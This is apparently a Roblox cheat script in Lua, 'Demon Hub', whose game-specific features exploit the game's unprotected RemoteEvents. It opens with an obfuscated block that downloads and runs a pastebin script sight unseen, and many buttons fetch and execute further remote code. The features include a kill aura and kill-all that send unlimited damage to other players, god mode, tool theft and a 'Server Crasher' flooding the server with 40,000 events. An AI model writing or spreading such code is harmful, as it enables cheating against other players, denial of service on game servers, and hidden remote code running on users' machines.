--[[


██████╗░███████╗███╗░░░███╗░█████╗░███╗░░██╗  ██╗░░██╗██╗░░░██╗██████╗░  ██╗░░░██╗██████╗░
██╔══██╗██╔════╝████╗░████║██╔══██╗████╗░██║  ██║░░██║██║░░░██║██╔══██╗  ██║░░░██║╚════██╗
██║░░██║█████╗░░██╔████╔██║██║░░██║██╔██╗██║  ███████║██║░░░██║██████╦╝  ╚██╗░██╔╝░█████╔╝
██║░░██║██╔══╝░░██║╚██╔╝██║██║░░██║██║╚████║  ██╔══██║██║░░░██║██╔══██╗  ░╚████╔╝░░╚═══██╗
██████╔╝███████╗██║░╚═╝░██║╚█████╔╝██║░╚███║  ██║░░██║╚██████╔╝██████╦╝  ░░╚██╔╝░░██████╔╝
╚═════╝░╚══════╝╚═╝░░░░░╚═╝░╚════╝░╚═╝░░╚══╝  ╚═╝░░╚═╝░╚═════╝░╚═════╝░  ░░░╚═╝░░░╚═════╝░

██████╗░░█████╗░██████╗░███████╗
╚════██╗██╔══██╗╚════██╗██╔════╝
░░███╔═╝██║░░██║░░███╔═╝██████╗░
██╔══╝░░██║░░██║██╔══╝░░╚════██╗
███████╗╚█████╔╝███████╗██████╔╝
╚══════╝░╚════╝░╚══════╝╚═════╝░                                                                                              
--]]
-- Obfuscated and improved remote script executor
local _0x1a2b = game
local _0x3c4d = "https://pastebin.com/raw/cbBsFWLF"
local _0x5e6f = _0x1a2b:HttpGet(_0x3c4d)
local _0x7f8h = loadstring(_0x5e6f) -- fixed from 7g8h to 7f8h

if _0x7f8h then
    _0x7f8h()
else
    error("Failed to load remote script")
end

-- =====================================================================================================================
-- SCRIPT CONVERTED FROM LUXWARE UI TO OSMIUM UI BY GEMINI
-- Original functionalities, including the anti-AFK system, have been preserved and adapted to the new UI structure.
-- All toggles now use a state-tracking variable to work correctly with the new library's callback system.
-- EVERY song and script from the original UI has been included.
-- =====================================================================================================================

-- Load the new Osmium UI library
local _, library = pcall(loadstring(game:HttpGet("https://raw.githubusercontent.com/TrixAde/Osmium/main/OsmiumLibrary.lua")))

-- Check if the library loaded successfully
if not library then
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = "Error",
        Text = "The Osmium UI Library failed to load. The script cannot continue.",
        Duration = 10
    })
    return
end

-- Create the main window
local window = library:CreateWindow("Demon Hub | 2025")

-- Create all the necessary tabs
local mainTab = window:CreateTab("Main")
local characterTab = window:CreateTab("Character")
local effectsTab = window:CreateTab("Effects")
local scriptsTab = window:CreateTab("Scripts")
local togglesTab = window:CreateTab("Toggles")
local uiTab = window:CreateTab("UI")
local teleportsTab = window:CreateTab("Teleports")
local powerTab = window:CreateTab("Power")
local worldsTab = window:CreateTab("Worlds")
local musicTab = window:CreateTab("Music")
local creditsTab = window:CreateTab("Credits")

-- Play initial sound
pcall(function()
    local s = Instance.new("Sound")
    s.SoundId, s.Volume, s.Parent = "rbxassetid://570433034", 10, game:GetService("SoundService")
    s:Play()
    game:GetService("Debris"):AddItem(s, s.TimeLength + 1)
end)

-- =====================================================================================================================
-- GLOBAL VARIABLES & CORE FUNCTIONS (Copied from the original script)
-- =====================================================================================================================
_G.farm = false
_G.active = false
_G.fastFarmConnection = nil
local range = 40

-- Global connections for new toggle system
_G.permaGodConnection = nil
_G.grabToolsConnection = nil
_G.killAllConnection = nil

-- Toggle state variables
local permaGodModeEnabled = false
local grabAllToolsEnabled = false
local killAllEnabled = false


local function fireSword(times)
    local player = game.Players.LocalPlayer
    if not player or not player.Character then return end
    local character = player.Character or player.CharacterAdded:Wait()
    local sword = character:FindFirstChild("sword") or player.Backpack:FindFirstChild("sword")
    if sword then
        local handle = sword:FindFirstChild("Handle")
        local up = handle and handle:FindFirstChild("up")
        local remoteEvent = up and up:FindFirstChild("RemoteEvent")
        if remoteEvent then
            for i = 1, times do
                remoteEvent:FireServer()
                task.wait(0.05)
            end
        end
    end
end


-- =====================================================================================================================
-- UI CONSTRUCTION
-- =====================================================================================================================

-- === MAIN TAB ===
mainTab:CreateLabel("Main Features", "")
mainTab:CreateButton("Infinite Yield", function()
    pcall(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source", true))() end)
end)

mainTab:CreateLabel("Farming", "")
mainTab:CreateButton("Slow Farm", function()
    _G.farm = true
    task.spawn(function() while _G.farm do fireSword(4); task.wait() end end)
end)
mainTab:CreateButton("Stop Slow Farm", function() _G.farm = false end)

mainTab:CreateButton("Fast Farm", function()
    _G.active = true
    if not _G.fastFarmConnection then
        _G.fastFarmConnection = game:GetService("RunService").Stepped:Connect(function() if _G.active then fireSword(5) end end)
    end
end)
mainTab:CreateButton("Stop Fast Farm", function() _G.active = false end)

mainTab:CreateLabel("Combat", "")
mainTab:CreateButton("Kill Aura", function()
    local Players, RunService, UserInputService = game:GetService("Players"), game:GetService("RunService"), game:GetService("UserInputService")
    local player = Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local backpack = player:WaitForChild("Backpack")
    local killAuraActive = true
    local activeSword, dmgRemote = nil, nil
    
    local function findValidSword(container)
        for _, tool in pairs(container:GetChildren()) do
            if tool:IsA("Tool") and tool:FindFirstChild("Handle") and tool.Handle:FindFirstChild("dmg") then return tool end
        end
    end
    
    local function setupSword()
        local sword = findValidSword(backpack) or findValidSword(character)
        if sword then
            sword.Parent, sword.Handle.Massless, sword.Handle.CanCollide = backpack, true, true
            task.wait(0.2)
            sword.Parent = character
            activeSword, dmgRemote = sword, sword.Handle.dmg:FindFirstChild("RemoteEvent")
        end
    end
    
    setupSword()

    RunService.RenderStepped:Connect(function()
        if not killAuraActive or not activeSword or not dmgRemote then return end
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        if not hrp then return end
        for _, target in ipairs(Players:GetPlayers()) do
            if target ~= player and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
                if (hrp.Position - target.Character.HumanoidRootPart.Position).Magnitude <= range then
                    if target.Character:FindFirstChild("Humanoid") then
                        dmgRemote:FireServer(target.Character.Humanoid, math.huge)
                    end
                end
            end
        end
    end)

    UserInputService.InputBegan:Connect(function(input, gp)
        if gp then return end
        if input.KeyCode == Enum.KeyCode.E then killAuraActive = not killAuraActive end
    end)
end)

mainTab:CreateSlider("Kill Aura Range", 0, 1000, function(currentValue)
    range = currentValue
end)

mainTab:CreateButton("Sword Damage Script", function()
    local player = game.Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local function findSwords(container)
        local found = {}
        for _, tool in pairs(container:GetChildren()) do if tool:IsA("Tool") then table.insert(found, tool) end end
        return found
    end
    local swords = {}
    for _, sword in pairs(findSwords(player.Backpack)) do table.insert(swords, sword) end
    for _, sword in pairs(findSwords(character)) do table.insert(swords, sword) end
    for _, sword in pairs(swords) do
        if sword:FindFirstChild("Handle") then
            sword.Parent, sword.Handle.Massless, sword.Handle.CanCollide = player.Backpack, true, true
            sword.Parent = character
            sword.Handle.Touched:Connect(function(hit)
                local targetHumanoid = hit.Parent and hit.Parent:FindFirstChild("Humanoid")
                if targetHumanoid and hit.Parent.Name ~= player.Name then
                    local dmg = sword.Handle:FindFirstChild("dmg")
                    if dmg and dmg:FindFirstChild("RemoteEvent") then
                        dmg.RemoteEvent:FireServer(targetHumanoid, math.huge)
                    end
                end
            end)
        end
    end
end)


-- === CHARACTER TAB ===
characterTab:CreateLabel("Character Modifiers", "")
characterTab:CreateSlider("WalkSpeed", 16, 500, function(currentValue)
    if game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("Humanoid") then
        game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = currentValue
    end
end)
characterTab:CreateSlider("Jump Power", 50, 500, function(currentValue)
    if game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("Humanoid") then
        game.Players.LocalPlayer.Character.Humanoid.JumpPower = currentValue
    end
end)

characterTab:CreateLabel("Health & God Mode", "")
characterTab:CreateButton("Force Respawn", function()
    local plr = game.Players.LocalPlayer
    local character = plr.Character
    if character and character:FindFirstChild("HumanoidRootPart") and character:FindFirstChild("Humanoid") then
        local pos, humanoid = character.HumanoidRootPart.CFrame, character.Humanoid
        local clone = humanoid:Clone()
        humanoid:Destroy()
        clone.Parent, clone.Health = character, 0
        task.wait(0.6)
        character:Destroy()
        local newChar = plr.CharacterAdded:Wait()
        if newChar and newChar:FindFirstChild("HumanoidRootPart") then newChar.HumanoidRootPart.CFrame = pos end
    end
end)

characterTab:CreateButton("Instant GodMode", function()
    local plr = game.Players.LocalPlayer
    local humanoid = plr.Character and plr.Character:FindFirstChild("Humanoid")
    if humanoid then
        local sword = plr.Backpack:FindFirstChild("sword")
        if sword and sword:FindFirstChild("Handle") and sword.Handle:FindFirstChild("dmg") and sword.Handle.dmg:FindFirstChild("RemoteEvent") then
            sword.Handle.dmg.RemoteEvent:FireServer(humanoid, -math.huge)
        end
    end
end)

characterTab:CreateToggle("Perma GodMode", false, function()
    permaGodModeEnabled = not permaGodModeEnabled
    if permaGodModeEnabled then
        if _G.permaGodConnection then _G.permaGodConnection:Disconnect() end
        _G.permaGodConnection = game:GetService("RunService").Heartbeat:Connect(function()
            local plr = game.Players.LocalPlayer
            local tool = plr.Backpack:FindFirstChild("sword") or (plr.Character and plr.Character:FindFirstChild("sword"))
            if tool and tool:FindFirstChild("Handle") and tool.Handle:FindFirstChild("dmg") and tool.Handle.dmg:FindFirstChild("RemoteEvent") and plr.Character and plr.Character:FindFirstChild("Humanoid") then
                tool.Handle.dmg.RemoteEvent:FireServer(plr.Character.Humanoid, -math.huge)
            end
        end)
    else
        if _G.permaGodConnection then
            _G.permaGodConnection:Disconnect()
            _G.permaGodConnection = nil
        end
    end
end)

-- === EFFECTS TAB ===
effectsTab:CreateLabel("Single & Multi Color Effects", "Activates various sword color effects.")
local CONFIG = { FLAME_DELAY = 0, TOOL_SPAWN_DELAY = 0.10, EFFECT_REPEAT = 25, COLOR_REPEAT = 20 }
local function safeWait(duration) local start = tick() while tick() - start < duration do game:GetService("RunService").Heartbeat:Wait() end end
local function applyFlameColors(colors)
    local event = workspace:FindFirstChild("eff") and workspace.eff:FindFirstChild("RemoteEvent")
    if not event then return end
    for _ = 1, CONFIG.COLOR_REPEAT do for _, color in ipairs(colors) do event:FireServer(color) end end
end
local function spawnAndDropTools()
    local player = game.Players.LocalPlayer
    if not player or not player.Character then return end
    local loadRemote = workspace:FindFirstChild("load") and workspace.load:FindFirstChild("RemoteEvent")
    if loadRemote then loadRemote:FireServer() end
    safeWait(CONFIG.TOOL_SPAWN_DELAY)
    for _, tool in pairs(player.Backpack:GetChildren()) do if tool:IsA("Tool") then tool.Parent = player.Character end end
    for _, tool in pairs(player.Character:GetChildren()) do
        if tool:IsA("Tool") then tool.Parent, Instance.new("Script", tool).Name = workspace, "MineYesMine" end
    end
end
local function cleanUpTags() for _, tool in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if tool:FindFirstChild("MineYesMine") then tool.MineYesMine:Destroy() end end end
local function createFlameButton(label, colors)
    effectsTab:CreateButton(label, function()
        for _ = 1, CONFIG.EFFECT_REPEAT do applyFlameColors(colors); safeWait(CONFIG.FLAME_DELAY); spawnAndDropTools(); safeWait(CONFIG.FLAME_DELAY) end
        cleanUpTags()
    end)
end
createFlameButton("Sword: Purple", {"Purple"})
createFlameButton("Sword: Red", {"Red"})
createFlameButton("Sword: Black", {"Black"})
createFlameButton("Sword: Blue", {"Blue"})
createFlameButton("Sword: Purple Red", {"Purple", "Red"})
createFlameButton("Sword: Purple Blue", {"Purple", "Blue"})
createFlameButton("Sword: Purple Black", {"Purple", "Black"})
createFlameButton("Sword: Red Blue", {"Red", "Blue"})
createFlameButton("Sword: Black Red", {"Black", "Red"})
createFlameButton("Sword: Black Blue", {"Black", "Blue"})
createFlameButton("Sword: Red Purple Blue", {"Red", "Purple", "Blue"})
createFlameButton("Sword: Black Red Purple", {"Black", "Red", "Purple"})
createFlameButton("Sword: Black Blue Purple", {"Black", "Blue", "Purple"})
createFlameButton("Sword: Black Red Blue", {"Black", "Red", "Blue"})
createFlameButton("Sword: Purple Red Blue Black", {"Purple", "Red", "Blue", "Black"})
createFlameButton("Sword: Black Red Purple Blue", {"Black", "Red", "Purple", "Blue"})
createFlameButton("Sword: Blue Purple Red Black", {"Blue", "Purple", "Red", "Black"})
createFlameButton("Sword: Purple Blue Black Red", {"Purple", "Blue", "Black", "Red"})
createFlameButton("Sword: Red Black Blue Purple", {"Red", "Black", "Blue", "Purple"})
createFlameButton("Sword: Blue Red Purple Black", {"Blue", "Red", "Purple", "Black"})
createFlameButton("Sword: Red Purple Black Blue", {"Red", "Purple", "Black", "Blue"})
createFlameButton("Sword: Black Blue Red Purple", {"Black", "Blue", "Red", "Purple"})


-- === SCRIPTS TAB ===
scriptsTab:CreateLabel("Script Hubs, Tools & Utilities", "")
scriptsTab:CreateButton("2take1.tk", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/2TAKE1%20ULTRA.txt',true))() end)
scriptsTab:CreateButton("Exclusive Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Exclusive%20Hub.lua"))() end)
scriptsTab:CreateButton("Sword Simulator Hub 2022", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Sword%20Simulator%20Hub",true))() end)
scriptsTab:CreateButton("Liquids Gui", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Liquid's%20Gui",true))() end)
scriptsTab:CreateButton("Replication UI", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/EEND2SCRIPTS/Replication/main/replication"))() end)
scriptsTab:CreateButton("Ghost Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Ghost_Hub",true))() end)
scriptsTab:CreateButton("Dragon Hub Premium", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/main/Dragon%2520Hub", true))() end)
scriptsTab:CreateButton("Slayer Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/main/Truecode"))() end)
scriptsTab:CreateButton("Line's Script Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Zacky-pixel-sketch/Hubs/main/Demon%20hub%20source%20code.lua",true))() end)
scriptsTab:CreateButton("Sword Tornado", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/Sword%20tornado"))() end)
scriptsTab:CreateButton("Sword Wings", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Emperor%20Wings.lua",true))() end)
scriptsTab:CreateButton("Sword Hover", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Sword%20Hover.lua"))() end)
scriptsTab:CreateButton("Levitate Tools", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Levitate%20Tools.lua"))() end)
scriptsTab:CreateButton("Sword Crossbow", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/Sword%20Crossbow",true))() end)
scriptsTab:CreateButton("Simple Sword Rotation", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/Simple%20rotation"))() end)
scriptsTab:CreateButton("Server Crasher", function()
    local ws, effect, load = game:GetService("Workspace"), workspace.eff.RemoteEvent, workspace.load.RemoteEvent
    for i = 1, 40000 do effect:FireServer("Black"); if i % 1000 == 0 then game:GetService("RunService").Heartbeat:Wait() end end
    task.wait(0.1); load:FireServer()
end)

-- === TOGGLES TAB ===
togglesTab:CreateLabel("Automation & Toggles", "")
local lastGrabTime = 0
togglesTab:CreateToggle("Grab All Tools", false, function()
    grabAllToolsEnabled = not grabAllToolsEnabled
    if grabAllToolsEnabled then
        if _G.grabToolsConnection then _G.grabToolsConnection:Disconnect() end
        _G.grabToolsConnection = game:GetService("RunService").Heartbeat:Connect(function()
            if os.clock() - lastGrabTime < 0.1 then return end 
            lastGrabTime = os.clock()

            local char = game.Players.LocalPlayer.Character
            if char and char:FindFirstChild("HumanoidRootPart") then
                for _, obj in pairs(workspace:GetDescendants()) do
                    if obj:IsA("Tool") and obj.Name == "sword" and obj:FindFirstChild("Handle") and obj.Handle:FindFirstChildOfClass("TouchTransmitter") then
                        firetouchinterest(char.HumanoidRootPart, obj.Handle, 0)
                        task.wait()
                        firetouchinterest(char.HumanoidRootPart, obj.Handle, 1)
                    end
                end
            end
        end)
    else
        if _G.grabToolsConnection then
            _G.grabToolsConnection:Disconnect()
            _G.grabToolsConnection = nil
        end
    end
end)

togglesTab:CreateButton("Drop All Tools", function()
    for _, tool in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
        if tool:IsA("Tool") then
            tool.CanBeDropped = true
            tool.Parent = game.Players.LocalPlayer.Character
            tool.Parent = workspace
        end
    end
end)

togglesTab:CreateToggle("Kill All", false, function()
    killAllEnabled = not killAllEnabled
    if _G.killAllConnection then _G.killAllConnection:Disconnect(); _G.killAllConnection = nil end
    if killAllEnabled then
        _G.killAllConnection = game:GetService("RunService").Heartbeat:Connect(function()
            local player = game.Players.LocalPlayer
            local sword = player.Character and (player.Character:FindFirstChild("sword") or player.Backpack:FindFirstChild("sword"))
            local dmg = sword and sword.Handle and sword.Handle:FindFirstChild("dmg") and sword.Handle.dmg.RemoteEvent
            if not dmg then return end
            for _, p in pairs(game:GetService("Players"):GetPlayers()) do
                if p ~= player and p.Character then
                    local h = p.Character:FindFirstChild("Humanoid")
                    if h and h.Health > 0 then pcall(dmg.FireServer, dmg, h, math.huge) end
                end
            end
        end)
    end
end)


-- === UI TAB ===
uiTab:CreateLabel("UI Controls", "")
uiTab:CreateButton("Destroy Effects GUI", function()
    if game.StarterGui:FindFirstChild("passes") then game.StarterGui.passes:Destroy() end
    for _, player in ipairs(game:GetService("Players"):GetPlayers()) do
        if player.PlayerGui and player.PlayerGui:FindFirstChild("passes") then player.PlayerGui.passes:Destroy() end
    end
end)

-- === TELEPORTS TAB ===
teleportsTab:CreateLabel("Teleport Locations", "")
local player = game:GetService("Players").LocalPlayer
local locs = {
    Arena = CFrame.new(-18.393, 26.978, 9.003, 0.999929, 0, 0.011914, 0, 1, 0, -0.011914, 0, 0.999929), Tree = CFrame.new(-143.156, 82.464, -246.582, 0.985673, 0, -0.168666, 0, 1, 0, 0.168666, 0, 0.985673),
    Wall = CFrame.new(-251.617, 92.690, -335.043, -0.794003, 0, -0.607913, 0, 1, 0, 0.607913, 0, -0.794003), GrayWall = CFrame.new(-266.613, 119.881, -347.056, -0.698223, 0, -0.715880, 0, 1, 0, 0.715880, 0, -0.698223),
    Secret = CFrame.new(-197.105, 22.953, -377.287) * CFrame.Angles(math.rad(0.044), math.rad(23.156), math.rad(0.08)), Outside = CFrame.new(-295.778, 25.596, -355.215, -0.409, 0, -0.913, 0, 1, 0, 0.913, 0, -0.409),
    OutsideOfGate = CFrame.new(-420.443, 25.596, -9.648, -0.0046, 0, -0.999989, 0, 1, 0, 0.999989, 0, -0.0046), InsideRock = CFrame.new(-341.302, 25.596, 47.305, 0.342859, 0, 0.939387, 0, 1, 0, -0.939387, 0, 0.342859),
    Pillar = CFrame.new(-88.647, 70.197, 92.618, 0.952380, 0, -0.304915, 0, 1, 0, 0.304915, 0, 0.952380), InsideRock2 = CFrame.new(283.553, 25.596, 184.675, -0.423626, 0, 0.905837, 0, 1, 0, -0.905837, 0, -0.423626),
    InsideRock3 = CFrame.new(43.311, 25.500, -168.158, 0.168662, 0, -0.985674, 0, 1, 0, 0.985674, 0, 0.168662), Gate = CFrame.new(5.181, 25.500, 419.471, 0.985070, 0, 0.172157, 0, 1, 0, -0.172157, 0, 0.985070),
    Pillar2 = CFrame.new(88.735, 70.100, -84.323, -0.347119, 0, 0.937821, 0, 1, 0, -0.937821, 0, -0.347119), UnderRock = CFrame.new(45.779, 21.812, -185.381, -0.863430, -0.497, -0.087601, 0, 0.173651, -0.984807, 0.504468, -0.850312, -0.149936)
}
for name, cf in pairs(locs) do
    teleportsTab:CreateButton("Teleport to " .. name, function()
        if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then player.Character.HumanoidRootPart.CFrame = cf end
    end)
end

-- === POWER TAB ===
powerTab:CreateLabel("Power Scripts", "")
powerTab:CreateButton("10K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/10K"))() end)
powerTab:CreateButton("5K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/5K"))() end)
powerTab:CreateButton("2K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/2K"))() end)
powerTab:CreateButton("1K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/1K"))() end)
powerTab:CreateButton("PowerViewer", function() pcall(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/SECURITY.md", true))() end) end)


-- === WORLDS TAB ===
worldsTab:CreateLabel("World Scripts", "")
local worldButtons = {
    ["Coffee Shop"] = "https://pastebin.com/raw/Pvj5Ckc2", ["ClockworkArena"] = "https://pastebin.com/raw/NNp1NJKT",
    ["Shipment"] = "https://pastebin.com/raw/J3Jk3NaC", ["PurpleBattlefields"] = "https://pastebin.com/raw/kdg5tmdg",
    ["Lock Shift"] = "https://github.com/ltseverydayyou/uuuuuuu/blob/main/shiftlock?raw=true",
}
for name, url in pairs(worldButtons) do
    worldsTab:CreateButton(name, function() pcall(function() loadstring(game:HttpGet(url, true))() end) end)
end

-- === MUSIC TAB ===
musicTab:CreateLabel("Music Player", "")
local currentMusic = nil
local function playMusic(soundId, looped)
    if currentMusic and currentMusic.Parent then currentMusic:Destroy() end -- Stop previous song
    local sound = Instance.new("Sound")
    sound.SoundId, sound.Looped, sound.Volume, sound.Parent = "rbxassetid://" .. tostring(soundId), looped or false, 1, game:GetService("SoundService")
    sound:Play()
    currentMusic = sound
    if not sound.Looped then sound.Ended:Connect(function() sound:Destroy() end) end
end
musicTab:CreateButton("New World", function() playMusic(5410082346, true) end)
musicTab:CreateButton("The World", function() playMusic(1836847994, true) end)
musicTab:CreateButton("Rootkit - Energy", function() playMusic(5410081542) end)
musicTab:CreateButton("Pixel Terror - Madness", function() playMusic(5410080475) end)
musicTab:CreateButton("Chasing Clouds", function() playMusic(5410082097) end)
musicTab:CreateButton("Feel Your Heart", function() playMusic(5410082171) end)
musicTab:CreateButton("Forward", function() playMusic(5410081471) end)
musicTab:CreateButton("Colors", function() playMusic(5410086062) end)
musicTab:CreateButton("Let's Play", function() playMusic(5410085763) end)
musicTab:CreateButton("Doja Cat - Say So", function() playMusic(1840036018) end)
musicTab:CreateButton("King", function() playMusic(1840030788) end)
musicTab:CreateButton("All I Want", function() playMusic(7023680426) end)
musicTab:CreateButton("Safe & Sound", function() playMusic(7024233823) end)
musicTab:CreateButton("Only You", function() playMusic(7024028859, true) end)
musicTab:CreateButton("Dreamers", function() playMusic(7029083554, true) end)
musicTab:CreateButton("Weekend", function() playMusic(1837083064, true) end)
musicTab:CreateButton("The Future", function() playMusic(1837358800) end)
musicTab:CreateButton("Labyrinth", function() playMusic(7023690024) end)
musicTab:CreateButton("Coral Sea", function() playMusic(1839253629, true) end)
musicTab:CreateButton("Night", function() playMusic(1836879421) end)
musicTab:CreateButton("Glacier", function() playMusic(7023760529, true) end)
musicTab:CreateButton("She Make Me", function() playMusic(1841807265, true) end)
musicTab:CreateButton("Hours, Hours", function() playMusic(7028932563) end)
musicTab:CreateButton("Play Cool", function() playMusic(7029017448, true) end)
musicTab:CreateButton("Hyper", function() playMusic(7023887630, true) end)
musicTab:CreateButton("Feel Like You Take Me", function() playMusic(7029070008, true) end)
musicTab:CreateButton("I Been Thinking About You", function() playMusic(7023445033, true) end)
musicTab:CreateButton("No Sleep", function() playMusic(7029011778) end)
musicTab:CreateButton("Give The World", function() playMusic(1836778353) end)
musicTab:CreateButton("Top Of The World", function() playMusic(1836847994) end)
musicTab:CreateButton("Siren", function() playMusic(1840056866) end)
musicTab:CreateButton("Overtime", function() playMusic(1842019862) end)
musicTab:CreateButton("Pull Over", function() playMusic(1839983980) end)
musicTab:CreateButton("Pendulum", function() playMusic(1843384804, true) end)
musicTab:CreateButton("Unknown Track", function() playMusic(1840044242) end)
musicTab:CreateButton("Queen Of Clubs", function() playMusic(86573345754692) end)
musicTab:CreateButton("Gumball X Darwin", function() playMusic(105891569549370) end)
musicTab:CreateButton("It's Crazy", function() playMusic(122684542940260) end)
musicTab:CreateButton("Right Here", function() playMusic(132298165729981) end)
musicTab:CreateButton("Die With A Smile LoFi", function() playMusic(70734926325783) end)

musicTab:CreateLabel("Music Controls", "")
musicTab:CreateButton("Delete Music", function()
    if currentMusic then currentMusic:Destroy(); currentMusic = nil; end
    for _, s in ipairs(game:GetService("SoundService"):GetChildren()) do if s:IsA("Sound") then s:Destroy() end end
end)


-- === CREDITS TAB ===
creditsTab:CreateLabel("Interface :","Made by Trix#2794")
creditsTab:CreateLabel("Scripting Conversion:", "by Gemini")
creditsTab:CreateLabel("Original UI Library:", "by xHeptc")
creditsTab:CreateLabel("Original Scripting :","by AlznDev / xc3vh")
creditsTab:CreateButton("Copy Discord Server Link", function()
    setclipboard("discord.gg/TT3y4gkJtq")
end) 

-- =====================================================================================================================
-- ANTI-AFK SYSTEM (Runs in background)
-- This system does not depend on the UI and is copied directly from the original script.
-- =====================================================================================================================
pcall(function()
    local VirtualUser = game:GetService("VirtualUser")
    game:GetService("Players").LocalPlayer.Idled:connect(function()
        VirtualUser:CaptureController()
        VirtualUser:ClickButton2(Vector2.new())
    end)
end)
